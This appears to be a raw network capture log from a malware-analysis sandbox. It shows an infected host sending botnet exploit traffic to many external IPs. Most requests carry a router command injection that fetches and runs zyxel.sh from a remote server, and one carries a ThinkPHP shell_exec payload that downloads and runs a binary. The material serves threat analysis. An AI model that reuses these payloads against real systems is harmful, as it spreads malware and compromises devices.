Feb 14, 2024 09:29:44.520154953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
376	192.168.2.15	44014	85.130.206.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.625536919 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.973697901 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
377	192.168.2.15	43690	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.645443916 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
378	192.168.2.15	43708	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:45.045234919 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
379	192.168.2.15	55986	85.214.146.127	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:45.278279066 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.457700968 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:47.833597898 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.052784920 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:47 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
380	192.168.2.15	43710	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:45.359848976 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
381	192.168.2.15	43714	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:45.681118965 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
382	192.168.2.15	43722	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:46.049948931 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
383	192.168.2.15	43726	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:46.386327028 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
384	192.168.2.15	43732	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:46.776467085 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
385	192.168.2.15	43736	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.085408926 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
386	192.168.2.15	43740	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.440088987 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
387	192.168.2.15	43324	85.122.213.232	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.447854996 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
388	192.168.2.15	45744	31.20.232.33	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.662065029 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
389	192.168.2.15	56842	94.70.168.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.686043024 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
390	192.168.2.15	38672	85.122.223.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.694886923 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
391	192.168.2.15	54242	94.120.58.95	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.695034027 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
392	192.168.2.15	58690	62.29.93.109	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.696420908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
393	192.168.2.15	40384	62.29.73.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.696592093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
394	192.168.2.15	60596	94.122.206.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.697782040 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
395	192.168.2.15	43758	107.163.234.188	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.767693996 CET	165	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:42Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
396	192.168.2.15	49690	95.217.145.165	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.818025112 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:48.044850111 CET	404	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:47 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
397	192.168.2.15	60942	94.46.180.61	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.880026102 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.101825953 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:47 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 